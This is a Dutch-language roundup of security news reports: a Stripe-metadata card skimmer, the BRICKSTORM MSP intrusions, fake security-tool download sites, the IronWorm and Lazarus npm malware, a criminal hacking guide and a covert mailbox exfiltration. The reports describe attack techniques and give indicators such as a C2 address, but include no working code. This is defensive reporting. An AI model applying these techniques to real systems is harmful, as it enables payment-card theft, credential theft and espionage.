De kwaadaardige code is volgens Sansec ingebed in legitiem ogende GTM-containers, die activeren wanneer een klant een afrekenpagina bereikt. Vervolgens wordt de Stripe API opgeroepen voor een specifiek klantenrecord, in dit geval `cus_TfFjAAZQNOYENR`. Uit de metadata-velden van dit record leest de malware JavaScript-code die het opnieuw samenstelt en vervolgens uitvoert met `new Function()`. De creditcard-skimmer richt zich op Magento- en Adobe Commerce-afrekenpagina's en probeert betalingsgegevens (creditcardnummer, vervaldatum, CVV-code, naam van de klant), evenals factuur- en e-mailadressen en telefoonnummers vast te leggen.

De gestolen gegevens worden samengevoegd tot één string, geobfusceerd met een XOR-bewerking en lokaal opgeslagen in plaats van onmiddellijk te worden geëxfiltreerd. Het ophalen van de gegevens gebeurt via een afzonderlijke routine, die direct na het laden van een pagina en vervolgens elke minuut wordt uitgevoerd. Hierbij wordt de datablob in tweeën gesplitst, een nieuw Stripe-klantobject aangemaakt en de gestolen gegevens opgeslagen in metadata-velden. Elke gestolen betaalkaart wordt zo een nep-klantenrecord in het Stripe account van de aanvaller, waardoor Stripe als opslagbackend voor gestolen gegevens fungeert. Zodra de gegevens zijn gekopieerd, wordt het lokale bestand gewist om sporen van de aanval te elimineren en dubbele uploads te voorkomen.

Sansec heeft ook een variant van de aanval ontdekt waarbij Google Firestore, een clouddatabaseservice voor gegevensopslag en realtime-opvraging, wordt gebruikt in plaats van Stripe. In die versie van de campagne wordt de payload opgehaald uit een Firestore-document genaamd `tracking/captcha` in een project met de naam `braintree-payment-app`. De gestolen gegevens worden daar opgeslagen in een andere `localStorage`-sleutel, `_d_data_customer_`. De namen van het document en het project helpen de malware op te gaan in legitiem betaal- en botbeveiligingsverkeer. Het Stripe-klantenrecord dat de skimmer bevatte, werd naar verluidt op 24 december 2025 aangemaakt, wat suggereert dat de operatie ten minste sinds die datum actief is. Klanten kunnen zich tegen dergelijke risico's beschermen door eenmalige virtuele kaarten met ingestelde limieten te gebruiken.

Bron: Sansec | Bron 2: hubs.li

Op 05 juni 2026 heeft Volexity details onthuld over de Chinese dreigingsactor VerdantBamboo, ook bekend als WARP PANDA of UNC5221. Deze groep is verantwoordelijk voor geavanceerde aanvallen waarbij Managed Services Providers (MSP’s) worden misbruikt om toegang te krijgen tot doelwitorganisaties. De bevindingen kwamen voort uit een incidentrespons-onderzoek dat in september 2025 startte, nadat verdacht netwerkverkeer werd waargenomen vanuit een virtuele machine op Linux-basis.

Het incident begon met een Egnyte Storage Sync systeem op het netwerk van een klant. Volexity ontdekte dat dit systeem verbinding maakte met een door de dreigingsactor beheerd domein achter IP-adressen van Cloudflare, in plaats van met een legitiem Egnyte-domein. Bovendien maakte de appliance TLS-verbindingen met Google’s publieke DNS-server (8.8.8.8) voor DNS over HTTPS-queries.

Uit analyse bleek dat VerdantBamboo het Storage Sync systeem had gecompromitteerd met behulp van de BRICKSTORM malware. Deze backdoor is eerder beschreven in rapporten van onder andere CISA, Google Cloud en NVISO. De dreigingsactor kreeg via de web SSL VPN van de slachtofferorganisatie toegang tot de appliance. Met de proxy-mogelijkheden van de malware en gestolen inloggegevens wist VerdantBamboo de Microsoft 365-omgeving (M365) van het slachtoffer te benaderen. Volexity schat met grote zekerheid in dat dit gebeurde om legitiem netwerkverkeer na te bootsen en Conditional Access-beleid te omzeilen.

Verder onderzoek toonde aan dat de initiële compromittering al minstens 18 maanden eerder had plaatsgevonden. Nadat de eerste herstelwerkzaamheden waren afgerond, keerde VerdantBamboo terug. Ze braken opnieuw in bij de slachtofferorganisatie door verbinding te maken met de firewall via gestolen administratieve inloggegevens. Deze toegang werd gebruikt om web SSL VPN-toegang in te schakelen en te configureren, waarna interne systemen werden benaderd en extra op maat gemaakte malware op een Synology NAS-apparaat werd geïmplementeerd.

Tijdens het onderzoek stelde Volexity vast dat VerdantBamboo ook de Managed Services Provider (MSP) van het slachtoffer had gecompromitteerd. Na een onderzoek van het MSP-netwerk bleek dat de pfSense-firewall van de MSP was geïnfecteerd met een BSD-variant van BRICKSTORM. Deze compromittering had eveneens minstens 18 maanden eerder plaatsgevonden. Volexity concludeert met redelijke zekerheid dat de slachtofferorganisatie indirect was gecompromitteerd via de inbraak bij de MSP.

Forensisch onderzoek van het Storage Sync systeem en de pfSense-firewall leidde tot de ontdekking van meerdere BRICKSTORM-backdoor-samples. Volexity vond later ook een BRICKSTORM-sample op een uitgeschakelde virtuele machine, een legacy Linux-gebaseerde GroupWise-server die werd gebruikt voor gearchiveerde e-mailberichten.

Naast BRICKSTORM identificeerde Volexity twee voorheen ongedocumenteerde malwarefamilies: PLENET en AGENTPSD. PLENET is geschreven in .NET Core en gecompileerd naar native code met behulp van Native AOT-functionaliteiten voor Linux systemen; Google Cloud noemde deze malware "GRIMBOLT". AGENTPSD, geschreven in Python en gecompileerd met PyInstaller, heeft beperkte functionaliteit en diende waarschijnlijk als fallback-backdoor. De aanvalsketen en de mogelijkheden van AGENTPSD, BRICKSTORM en PLENET worden uitgebreid beschreven in het rapport van Volexity.

Bron: Volexity | Bron 2: virustotal.com | Bron 3: learn.microsoft.com

Hackers hebben overtuigende nepwebsites opgezet die populaire security tools imiteren om gebruikers te verleiden malware te downloaden. Deze sites zijn professioneel ontworpen en lijken vrijwel identiek aan de officiële projectpagina's, inclusief links naar daadwerkelijke GitHub-repositories. Echter, zodra een gebruiker op de downloadknop klikt, worden slachtoffers via een verborgen verkeersfiltersysteem, bekend als een Traffic Distribution System (TDS), omgeleid.

Dit TDS fungeert als een poortwachter en bepaalt welke gebruikers worden doorgestuurd naar malware en welke een onschadelijk bestand ontvangen. Het systeem screent op locatie, browsertype, VPN-gebruik en de mogelijke aanwezigheid van een security onderzoeker, wat detectie en identificatie van de aanval bemoeilijkt.

Analisten van Check Point Research hebben deze grootschalige campagne onderzocht en ontdekten dat de nepwebsites een JavaScript-script laden dat wordt gehost op het CloudFront-netwerk van Amazon. Dit script onderschept de eerste downloadklik en stuurt de gebruiker onzichtbaar door naar het TDS, zonder dat er zichtbaar iets ongebruikelijks gebeurt. Check Point meldt dat de operatie specifiek gericht is op tools die door security professionals worden gebruikt, waaronder Ghidra, dnSpy en SpiderFoot.

De campagne is al minstens sinds december 2025 actief, waarbij de levering van malware vanaf begin januari 2026 is bevestigd. Telemetrie van VirusTotal toont meer dan 5.000 inzendingen die gekoppeld zijn aan gerelateerde samples, en onderzoekers merken op dat de werkelijke blootstelling waarschijnlijk veel hoger is. Het feit dat de geïmiteerde tools dagelijks worden gebruikt door security onderzoekers, maakt deze campagne bijzonder zorgwekkend, aangezien het de mensen treft die getraind zijn om dergelijke bedreigingen te herkennen.

Drie verschillende malwarefamilies dienen als uiteindelijke payloads. RemusStealer is een nieuw opgedoken infostealer die data van meer dan 20 browsers steelt, waaronder cryptocurrency wallets, password managers en tools voor twee-factor authenticatie. AnimateClipper monitort stilletjes het klembord en verwisselt gekopieerde walletadressen met door aanvallers gecontroleerde adressen, waardoor mogelijk echte fondsen worden omgeleid zonder dat het slachtoffer dit merkt. Een derde payload, genaamd SessionGate, is een multi-stage loader met zware obfuscation en een eenmalige sleutellevering, wat analyse buitengewoon moeilijk maakt.

Meer dan 100 actieve nepwebsites zijn geïdentificeerd in dit cluster, die allemaal dezelfde CloudFront-gehoste scripts en campagne-identificatoren delen. Sites zoals ghidralite[.]com en dnspy[.]org verschijnen bovenaan de Google-resultaten voor relevante zoekopdrachten, wat hen een vals gevoel van autoriteit geeft. Wanneer een gebruiker de muis over de downloadknop beweegt, toont de statusbalk van de browser zelfs een echte GitHub-URL, zodat voorzichtige gebruikers mogelijk niets verkeerds opmerken. Het JavaScript dat door deze pagina's wordt geladen, luistert naar de eerste interactie van de gebruiker en onderschept deze voordat de normale navigatie kan plaatsvinden. Op Chrome legt het een mousedown-event vast; op Firefox gebruikt het een click-event. Vervolgens genereert het een TDS runtime URL, leidt de gebruiker stilzwijgend om en annuleert de oorspronkelijke navigatie volledig. Het slachtoffer belandt ergens totaal anders dan de bedoeling was, en het hele proces is onzichtbaar.

SessionGate onderscheidt zich door zijn agressieve weerstand tegen analyse. Het oorspronkelijk gedownloade bestand is een 7-Zip-archief van ongeveer 20 MB, maar het eigenlijke uitvoerbare bestand erin is slechts 15 MB, waarbij de resterende 5 MB bestaat uit geobfusceerde loadercode die is ontworpen om tools zoals de decompiler van IDA te omzeilen. Functies kunnen meer dan 500 KB groot zijn, en versleutelde strings worden in coderuimtes geplaatst om disassemblers verder te verwarren. De decryptiesleutel voor de laatste payload-fase wordt server-side gegenereerd en slechts één keer per slachtoffersessie vrijgegeven. Als een onderzoeker de keten vanaf een ander IP-adres probeert te herhalen, retourneert de server een geldig ogende maar nutteloze sleutel, waardoor de payload volledig onleesbaar wordt.

Security teams wordt sterk aangeraden om software uitsluitend van officiële projectpagina's of geverifieerde repositories te downloaden, bestands-hashes na het downloaden te verifiëren en actief uitgaande verbindingen naar de Command & Control (C2) domeinen en infrastructuur die in deze campagne zijn geïdentificeerd, te monitoren.

Bron: Check Point Research | Bron 2: research.checkpoint.com

Een nieuwe aanval op de supply chain heeft 36 pakketten in de Node Package Manager (npm) index geïnfecteerd met de infostealer malware genaamd IronWorm. Deze malware, geschreven in Rust, is ontworpen om 86 omgevingsvariabelen en 20 credential-bestanden te stelen. Hieronder vallen onder andere OpenAI-, AWS-, Anthropic- en npm-referenties, configuratiebestanden van vaults, SSH-sleutels en Exodus cryptocurrency wallet-bestanden.

Onderzoekers van JFrog, een bedrijf gespecialiseerd in supply chain en devops, meldden dat IronWorm zich verbergt achter een eBPF kernel rootkit en communiceert met de operator via het netwerk van Tor. De Rust-gebaseerde malware verspreidt zichzelf door gestolen referenties te gebruiken voor publicatie op npm, inclusief geheimen die zijn gekoppeld aan npm's Trusted Publishing workflow. Zodra een ontwikkelaar of CI-omgeving is gecompromitteerd, kan de malware getrojaniseerde versies van pakketten publiceren die eigendom zijn van het slachtoffer, waardoor vervolgens extra ontwikkelaars en CI-systemen worden geïnfecteerd.

Dit gedrag vertoont conceptuele overeenkomsten met Shai Hulud, waarvan de code onlangs op GitHub werd gepubliceerd. Hoewel JFrog-onderzoekers geen duidelijke connectie vonden tussen IronWorm en Shai Hulud, observeerden ze wel dezelfde commit-namen in beide supply-chain aanvallen. Dit opent de mogelijkheid dat de nieuwe malware een evolutie is van de payload van TeamPCP, aangezien IronWorm een "op maat gemaakt, zorgvuldig gebouwd implantaat van een operatie met eigen infrastructuur" lijkt te zijn.

Volgens JFrog begon de recente aanval vanuit een gecompromitteerd account genaamd 'asteroiddao', dat pakketversies publiceerde die een Rust ELF-binary bevatten, uitgevoerd via 'preinstall'. Malafide commits werden vervolgens in repositories gepusht. De auteur van de commits verschijnt als "claude", en de tijdstempels wijzen op enkele jaren geleden, in sommige gevallen zelfs tot 13 jaar, hoewel ze pas de afgelopen dagen zijn gepusht. Dit is waarschijnlijk bedoeld om onderzoek te omzeilen.

Een opmerkelijk element in de bevindingen van JFrog is een mechanisme dat afhankelijk is van GitHub Actions om de gestolen geheimen te leveren. JFrog legt uit dat de malware de geheimen serialiseert tot één enkele waarde en deze vervolgens "wegschrijft naar een onschuldig ogend bestand, alsof het lint- of formatteringsoutput betreft". De laatste stap van het proces is het uploaden van het bestand als een build-artefact, dat door iedereen met toegang kan worden gedownload. Op deze manier kan de dreigingsactor een externe command-and-control (C2) volledig vermijden. De onderzoekers merken echter op dat dit leveringsmechanisme niet is gebruikt in de geanalyseerde IronWorm supply-chain aanval.

Een andere bijzonderheid is dat de operator de herstelzin van zijn eigen cryptocurrency wallet had vastgelegd in de code. De onderzoekers stellen dat de enige reden hiervoor is dat de dreigingsactor niet wilde dat de malware deze zou stelen tijdens de testfase.

Het applicatiebeveiligingsbedrijf Ox Security meldde dat de IronWorm-aanval zeer vroeg werd gedetecteerd en gestopt voordat deze zich kon verspreiden naar populairdere pakketten op npm. Het bedrijf heeft een lijst gepubliceerd van alle getroffen pakketnamen en hun versies, en adviseert ontwikkelaars om te upgraden naar gefixte releases, hun sleutels te roteren en twee-factor authenticatie (2FA) in te schakelen voor alle accounts. Tegelijkertijd hebben Endor Labs en StepSecurity een zeer vergelijkbare, maar afzonderlijke aanval waargenomen met JavaScript-gebaseerde malware genaamd binding.gyp, die registry poisoning en GitHub Actions-infectie uitvoerde in hetzelfde tijdsbestek.

Bron: JFrog | Bron 2: ox.security | Bron 3: endorlabs.com

Een recente discussie op een ondergronds forum, getiteld "Hacking for Profit. Working method", biedt een zeldzame inkijk in de manier waarop cybercriminelen informatie over de exploitatie van kwetsbaarheden en hacktechnieken delen. De post, geschreven door een actor genaamd "Hercules", is niet bijzonder lang of technisch, maar blinkt uit in het opdelen van een complex proces in duidelijke, uitvoerbare stappen. Het behandelt het scannen, detecteren, beoordelen, exploiteren en te gelde maken van kwetsbaarheden, en geeft inzicht in de betekenis van vulnerability disclosure programma’s.

Onderzoekers van Flare analyseerden de originele post en de reacties daarop gedurende enkele maanden. De activiteit rondom de draad toonde aan dat de invloed ervan verder reikte dan de initiële publicatie. Meerdere gebruikers bedankten "Hercules", vroegen om privécontact, identificeerden zichzelf als beginners of gaven aan begeleiding te zoeken om van theoretische kennis naar praktische hacking over te stappen. Het succes van de post was zo groot dat de methode werd herplaatst en besproken op vier extra forums, wat aantoont hoe "Hercules" beginnende dreigingsactoren een eenvoudig raamwerk biedt voor het begrijpen van de exploitatie van kwetsbaarheden en het verdienen van geld hiermee.

De handleiding van "Hercules" legt uit hoe een ontdekte kwetsbaarheid te gelde kan worden gemaakt. Het begint met advies over het zoeken naar recentelijk openbaar gemaakte kwetsbaarheden, met name kwetsbaarheidsklassen met een grote impact, zoals remote code execution, authenticatie bypass, accountovername, IDOR (Insecure Direct Object Reference) en data-expositie. Vervolgens wordt ingegaan op het identificeren van blootgestelde systemen, het valideren of deze systemen kwetsbaar zijn, en het beslissen of de resultaten moeten worden gerapporteerd, verkocht of geëxploiteerd.

Drie aspecten vallen op in de handleiding van de dreigingsactor: het gebruik van het Nuclei framework van projectdiscovery.io, een populaire tool onder offensive security professionals; het inzicht in de uitdagingen waarmee verdedigers worden geconfronteerd bij het patchen van nieuw ontdekte kwetsbaarheden; en de verdeling van de handleiding in een "legale" en een "illegale" sectie. Dit betekent dat lezers in elke fase kunnen beslissen om van kwetsbaarheidsmelding over te stappen op hacking.

Het meest effectieve deel van de handleiding is niet een technische truc, maar de toon. "Hercules" schrijft in duidelijke taal en presenteert het proces als iets dat door actie kan worden geleerd. Hij stelt dat veel tutorials zich te veel richten op computerwetenschappen, besturingssystemen, programmeren of scannerparameters, terwijl beginners willen "hacken", "inbreken" en "toegang krijgen". Hij suggereert ook dat gebruikers geen geavanceerde software engineers hoeven te zijn om te beginnen. Publieke tools, community templates, automatisering en zelfs assistentie van AI worden gepresenteerd als manieren om de drempel te verlagen, terwijl programmeervaardigheden als nuttig maar niet verplicht worden beschreven. De onderliggende boodschap is simpel: de technische kloof is kleiner dan beginners denken. Deze boodschap verklaart een groot deel van de forumreacties, waarin gebruikers aangaven ondanks vele cursussen nog niet praktisch te kunnen hacken, of vroegen of gebrek aan programmeerkennis een probleem zou zijn. De handleiding nodigt lezers uit contact op te nemen voor verdere begeleiding.

Bron: Flare | Bron 2: projectdiscovery.io | Bron 3: aquasec.com

Het Britse National Cyber Security Centre (NCSC) heeft softwareontwikkelaars geadviseerd om packages en andere updates van afhankelijkheden niet langer automatisch te installeren. In plaats daarvan dienen deze eerst handmatig te worden gecontroleerd. Dit advies volgt op een eerdere aanbeveling van het Amerikaanse cyberagentschap CISA, dat ontwikkelaars opriep om minstens drie uur te wachten met de installatie van nieuwe packages. De aanleiding voor deze waarschuwingen zijn de toegenomen aanvallen op software supply chains waarmee veel organisaties recentelijk te maken hebben gehad.

De afgelopen weken is gebleken dat aanvallers diverse packages op platforms zoals GitHub, npm of de Python Package Index (PyPI) hebben voorzien van malware. Softwareontwikkelaars die voor hun projecten gebruikmaken van deze packages en de geïnfecteerde versies installeerden, raakten hierdoor zelf geïnfecteerd. De malware was vervolgens in staat om inloggegevens, tokens, keys en andere credentials van deze ontwikkelaars te stelen. Hierdoor konden ook hun softwareprojecten worden geïnfecteerd, wat een breed risico vormt voor de uiteindelijke gebruikers van de software.

Het Britse NCSC benadrukt dat softwareontwikkelaars direct een aantal concrete maatregelen kunnen treffen om de risico's te beperken. Een van de belangrijkste aanbevelingen is het handmatig controleren van alle nieuwe updates, afhankelijkheden en versies voordat deze worden geïmplementeerd. Daarnaast adviseert de Britse overheidsdienst om in het geval van een vermoedelijke aanval op de supply chain de automatische updates van afhankelijkheden te pauzeren. Het is tevens essentieel dat ontwikkelaars een duidelijk overzicht hebben van alle afhankelijkheden die binnen hun projecten worden gebruikt. Tot slot wordt aangeraden om een evenwicht te vinden tussen het snel installeren van beveiligingspatches en het langzamer updaten van externe afhankelijkheden, om zo de potentiële impact van een succesvolle aanval te minimaliseren. Dit strategische uitstel kan cruciale tijd bieden voor het detecteren en mitigeren van besmette updates.

Bron: NCSC

De Lazarus Group uit Noord-Korea heeft een nieuwe npm-campagne gelanceerd die zich richt op ontwikkelaars. Deze campagne maakt gebruik van misleidende pakketnamen om toegang te verkrijgen tot de systemen en software build-omgevingen van ontwikkelaars. Sonatype Security Research volgt tientallen kwaadaardige npm-pakketten die aan deze campagne gekoppeld zijn. Sommige van deze pakketten bereikten tot wel 500 wekelijkse downloads. De pakketten zijn zo ontworpen dat ze gerelateerd lijken aan vertrouwde JavaScript-projecten en tools, wat de kans vergroot dat ontwikkelaars ze installeren tijdens hun normale werkzaamheden.

In tegenstelling tot de gebruikelijke typosquatting-technieken, waarbij hackers misbruik maken van spelfouten, vond Sonatype dat in dit geval brandjacking-methoden werden toegepast. Dit omvat onder andere de toevoeging van achtervoegsels, het inbedden van projectnamen en het nabootsen van versienummers. Onderzoekers zagen voorbeelden van namen die waren opgebouwd rond bekende projecten zoals Buffer, Chai, React, Express, JWT en Webpack. Deze naamgevingsstrategie is effectiever voor aanvallers, omdat npm veel kleine hulpbibliotheken, wrappers en plugins bevat. Een pakket genaamd `buffer-utilities`, bijvoorbeeld, kan een legitieme aanvulling lijken op het veelgebruikte buffer-pakket, zelfs als er geen echte verbinding is met het project.

De analyse van Sonatype van `buffer-utilities` toonde aan dat het pakket gekopieerde code van de echte buffer-bibliotheek bevatte, maar ook functioneerde als een kwaadaardige dropper. Na installatie decodeerde het Base64-gecodeerde URL's, haalde het externe inhoud op van `www.jsonkeeper.com` en voerde het de opgehaalde code uit met `eval()`. Onderzoekers stelden vast dat dit patroon ook in andere pakketten, die aan dezelfde Lazarus-activiteit zijn gekoppeld, voorkwam. Het gebruik van `www.jsonkeeper.com` is eveneens opmerkelijk, aangezien Sonatype Lazarus eerder heeft waargenomen bij het hosten van payloads via deze service.

Nadat de eerste fase is uitgevoerd, kan de malware een Node.js-backdoor en downloader installeren. Deze payload verzamelt basis systeemdetails, waaronder de hostnaam, gebruikersnaam, besturingssysteem, home-directory en procesargumenten. Vervolgens maakt het contact met de command and control-infrastructuur om verdere instructies te ontvangen. De malware kan ook een verborgen .vscode-directory aanmaken in de home-map van de gebruiker, meer bestanden downloaden en door de aanvaller beheerde JavaScript als een losgekoppeld achtergrondproces starten. Sonatype meldde dat het pakket een payload van de derde fase, genaamd `f.js`, kan ophalen, samen met een `package.json-bestand`, waarna het `npm install --silent` uitvoert voordat de payload wordt gestart. Dit gedrag stelt de aanvaller in staat om toegang te behouden en kwaadaardige bestanden over tijd te vernieuwen. Sonatype rapporteerde ook een updatemechanisme dat de payload in staat stelt opnieuw verbinding te maken met command and control-servers, te controleren op nieuwere versies en lokale bestanden te vervangen.

De campagne toont aan waarom npm aantrekkelijk blijft voor geavanceerde dreigingsactoren. Ontwikkelaars installeren vaak pakketten op basis van naamsbekendheid, projectgeschiktheid of gemak, vooral in JavaScript-omgevingen waar kleine afhankelijkheden veelvoorkomend zijn. De link met de Lazarus Group geeft gewicht aan de bevindingen. Hoewel de groep vaak wordt geassocieerd met financiële diefstal en spionageoperaties van hoog profiel, toont deze activiteit de interesse van de groep in machines van ontwikkelaars, inloggegevens, build-systemen en langdurige toegang tot bedrijfsomgevingen.

Organisaties die `buffer-utilities` versie 1.0.0 of pakketten die geassocieerd zijn met Sonatype-identificatie `sonatype-2026-003558` hebben geïnstalleerd, moeten deze verwijderen en de getroffen systemen controleren op tekenen van verdere compromittering. Sonatype waarschuwde dat verwijdering alleen mogelijk niet voldoende is als latere payloads al zijn uitgevoerd. Beheerders moeten ook controleren op netwerkverbindingen met `www.jsonkeeper.com`, command and control-verkeer naar `45.59.163.198:1244`, onverwachte .vscode-mappen in home-directories van gebruikers, ongebruikelijke Node.js-processen en onverklaarde toegang tot inloggegevens vanaf werkstations van ontwikkelaars of build-systemen.

Bron: Sonatype

Cybersecurity onderzoekers hebben een grootschalige operatie blootgelegd die legitieme open source en freeware projecten nabootst. Het doel is om onwetende gebruikers via een Traffic Distribution System (TDS) naar kwaadaardige software te leiden, waaronder de Remus Stealer, AnimateClipper en het SessionGate framework.

Alexey Bukhteyev, security onderzoeker bij Check Point, legt uit dat "de websites goed zijn ontworpen en bij een snelle blik vaak legitieme projectportalen lijken, soms zelfs verwijzend naar echte bronnen. De misleiding zit niet alleen in de inhoud van de pagina, maar vooral in wat er gebeurt wanneer een gebruiker interactie heeft."

Deze nagemaakte pagina’s laden een via CloudFront gehoste JavaScript staging laag. Deze laag zet een klik op een download knop of link om in een doorverwijzing naar een TDS. Het TDS hanteert strikte controlemechanismen, waaronder de status van het eerste bezoek, verplichte klikbevestiging, anti-bot en anti-analyse logica, VPN en datacenter filtering, en frequentielimieten.

Men vermoedt dat de operatie is gericht op het verwerven en monetariseren van verkeer, waarbij geselecteerde gebruikers naar infrastructuur voor malware distributie worden geleid. Enkele van de geïdentificeerde websites imiteren betrouwbare reverse-engineering en security tools zoals Ghidra, dnSpy en SpiderFoot.

De aanvalsketens richten zich specifiek op gebruikers die via zoekmachines zoals Google naar dergelijke tools zoeken. Hierdoor verschijnen de nagemaakte websites bovenaan de zoekresultaten. Een eerdere versie van de campagne werd in november 2025 door Fullstory gedocumenteerd. Bewijs toont aan dat de activiteit al sinds september 2025 gaande is.

Het in Atlanta gevestigde bedrijf merkte destijds op dat "deze domeinen gericht zijn op het verkrijgen van gunstige zoekmachineposities door gebruik te maken van de naam, het merk en de populariteit van de originele websites en projecten." Veel websites staan bovenaan de zoekresultaten op Google voor de relevante zoekterm, vaak hoger dan de echte projectwebsite, wat hun zichtbaarheid maximaliseert en kan leiden tot meer links en inhoud.

Hoewel er aanvankelijk geen aanwijzingen waren voor kwaadaardige activiteiten anders dan het genereren van inhoud om verkeer aan te trekken en derden in staat te stellen hun eigen websites te adverteren, tonen de nieuwste bevindingen van Check Point aan dat de TDS scripts niet lang daarna werden ingesloten. De infrastructuur werd vanaf januari 2026 omgevormd voor de distributie van malware.

Een klik op de "Download" knop initieert een TDS omleidingsketen die resulteert in de implementatie van malware. Een opvallend aspect is dat bij het zweven over de knop de legitieme URL zichtbaar wordt van waar de tool kan worden gedownload, wat de website een schijn van legitimiteit geeft.

De omleidingsketens zijn ook zo ontworpen dat herhaalde pogingen om de site te bezoeken vanaf hetzelfde IP-adres resulteren in de download van goedaardige software, zoals de Opera browser of onnodige browser extensies. Enkele van de payloads die via dit TDS worden verspreid, zijn:

*   **SessionGate:** Een voorheen onbekende multi-stage, versluierde loader die wordt gebruikt om potentieel ongewenste applicaties (PUA) te leveren. Het bevat uitgebreide anti-analyse mechanismen om sandboxes te misleiden door over te schakelen naar een goedaardige installatie ervaring.

*   **Remus Stealer:** Een nieuwe informatie stealer, aangeboden onder een malware als een service (MaaS) model. Deze kan data stelen van meer dan 20 browsers, inclusief honderden browser extensies en applicaties, zoals cryptocurrency wallets, twee factor authenticatie tools en wachtwoordmanagers. Remus wordt beschouwd als een variant van de Lumma Stealer.

*   **AnimateClipper:** Een cryptocurrency clipper die gekopieerde wallet adressen in het klembord kan vervangen en transacties kan kapen over meer dan 20 blockchain ecosystemen. Het wordt geleverd via een ClickFix lokmiddel.

Een analyse van VirusTotal telemetrie heeft tot op heden ongeveer 2.000 tot 3.500 inzendingen van samples geassocieerd met de SessionGate familie onthuld. Het merendeel van deze inzendingen kwam uit Turkije, Polen, Brazilië, Duitsland, Frankrijk, Rusland en het Verenigd Koninkrijk.

Het uiteindelijke doel van de SessionGate infectieketen is het droppen van een payload die uniek is per client en pas wordt geleverd na het volledig doorlopen van het omleidingspad. De multi-stage leveringsketen, gecombineerd met uitgebreide validatie logica en TDS-gerelateerde gating, is ontworpen om analyse te weerstaan en het ophalen van de payload voor analisten een uitdagende taak te maken. De uiteindelijke DLL payload is verantwoordelijk voor communicatie met een externe server, het ophalen van een versleutelde configuratie van de server, het extraheren van de download URL uit de configuratie, en het downloaden en stil uitvoeren van de volgende fase malware via "cmd.exe."

Bukhteyev concludeert: "De toegangssites imiteren legitieme open source project portals, bewaren echte GitHub links om snelle visuele controles te doorstaan, en gebruiken vervolgens klik onderschepping om de eerste download klik om te leiden naar een afgeschermde TDS stack." Hij voegt eraan toe: "Het meest aannemelijke primaire doel is verkeersacquisitie en monetarisatie. Echter, door een afgeschermde TDS laag in te bedden en zoekverkeer ernaartoe te leiden, worden de operators onderdeel van een distributieketen waarvan de downstream consumenten malware distributeurs kunnen zijn. Dezelfde verkeerspijplijn die grijze monetarisatie aanstuurt, kan ook selectief echte gebruikers naar kwaadaardige payloads leiden."

Bron: Check Point

Onbekende aanvallers hebben ten minste vijf maanden lang toegang gehad tot de Outlook mailbox van een hooggeplaatste directeur bij een grote wereldwijde beurs. Gedurende deze periode kopieerden de aanvallers de inhoud van de mailbox in kleine, herhaalde batches en leidden deze data via Dropbox en OneDrive om de activiteit te laten opgaan in normaal cloudverkeer.

Symantec en Carbon Black's Threat Hunter Team rapporteerden deze campagne deze week. De aard van de commando's duidt op spionage en verzameling van inlichtingen, in plaats van diefstal voor financieel gewin. De namen van de directeur en de beurs zijn niet bekendgemaakt. De waarde van dergelijke informatie is echter duidelijk: de inbox van een beursdirecteur kan niet-openbare noteringsdetails, handhavingskwesties, dealvoorwaarden, marktverplaatsende plannen, evenals de agenda en contacten van de directeur bevatten. Vijf maanden onopgemerkte toegang gaf de aanvaller een gedetailleerd inzicht in de activiteiten van de directeur en de toekomstige richting van de organisatie, zonder dat brede toegang tot andere bedrijfssystemen nodig was.

De eerste kwaadaardige activiteit werd waargenomen op 10 oktober 2025. Op dat moment voerde de aanvaller al twee binaire bestanden uit als SYSTEM, het hoogste Windows-privilegeniveau. Eén van deze bestanden deed zich voor als een Adobe updater en de andere als OneDrive. Tegen de tijd dat verdedigers iets opmerkten, had de indringer volledige controle over de machine, en de initiële toegangsmethode blijft onbekend. Symantec bevestigde echter dat de eerste tekenen waarschijnlijk afkomstig waren van laterale beweging vanaf een eerder gecompromitteerd apparaat.

De operatie kwam op 12 november in een hogere versnelling. De aanvaller verkreeg een Dropbox API token, begon data te uploaden met `curl`, en zette de hoofdgereedschap in: een mailbox stealer gebouwd op Aspose, een legitieme .NET bibliotheek die Outlook OST- en PST-bestanden leest. Dit gereedschap, verpakt in een uitvoerbaar bestand, converteerde de mailbox naar PST-formaat en schreef deze naar schijf, telkens uitgevoerd met een wachtwoord en een vlag voor het datumbereik. De eerste run omvatte alle data vanaf augustus 2025. Daarna keerde de aanvaller elke twee tot vier weken terug, waarbij elke run alleen de data sinds de vorige keer verzamelde. Dit gebeurde nog acht keer tot 17 februari 2026, wat resulteerde in een bijna continue kopie van de mailbox, opgesplitst in kleine genoeg delen om geen aandacht te trekken van beveiligingssoftware.

De stealth werd bereikt door de activiteiten er alledaags uit te laten zien. Geplande taken deden zich voor als systeem services van Adobe, Lenovo en OneDrive. Voor exfiltratie gebruikte de aanvaller Dropbox en OneDrive Personal. Voor OneDrive maakten ze verbinding met hardgecodeerde Microsoft IP-adressen in plaats van de onedrive.live.com hostname, zodat er geen DNS-zoekopdrachten waren die perimeter beveiligingssystemen konden detecteren of blokkeren. De aanvaller testte ook de publieke bestandshost temp.sh in november, maar liet deze daarna vallen. De laatst waargenomen activiteit, op 19 maart 2026, was een nieuwe backdoor die wel was klaargezet maar nooit werd uitgevoerd, wat volgens Elias van Symantec kan betekenen dat de aanvaller kort daarna de toegang verloor.

Symantec's gepubliceerde indicatoren wijzen op een bredere inbraakkit, niet alleen een mailbox grabber: FRPC voor het tunnelen van verkeer naar buiten, Secretsdump voor het ophalen van Windows credentials, SharpDecryptPwd voor het herstellen van opgeslagen app-wachtwoorden, en een tool om Windows User Account Control te omzeilen. Het rapport specificeert niet hoe elk van deze tools in dit specifieke geval werd gebruikt, en geen van hen wijst op een specifieke groep. Er is geen CVE in dit verhaal; het betrof een inbraak in een persoonlijke mailbox, niet de exploitatie van een recent onthulde kwetsbaarheid. Dit benadrukt waarom het incident belangrijk is: er is geen patch die dit dicht, en de verantwoordelijkheid verschuift naar monitoring en respons.

Attributie blijft onopgelost. De mix van publieke tools en consumenten cloud services liet weinig over om de activiteit te verbinden met een bekende actor, en dat blijft zo totdat een sterkere bron anders aangeeft. Exfiltratie via Dropbox en OneDrive om op te gaan in het normale verkeer is een bekende tactiek, en Microsoft heeft deze methode al eerder aangemerkt als een bewuste manier om perimeter verdedigingen te omzeilen en attributie te bemoeilijken. Organisaties die marktverplaatsende informatie beheren, doen er goed aan de hashes te controleren en te letten op ongebruikelijke mailbox exportactiviteit, vreemde Outlook-toegang, uploads naar persoonlijke Dropbox- of OneDrive-accounts, onverwachte tunneling, en het dumpen van credentials op systemen die gekoppeld zijn aan geprivilegieerde gebruikers.

Bron: Symantec en Carbon Black | Bron 2: security.com

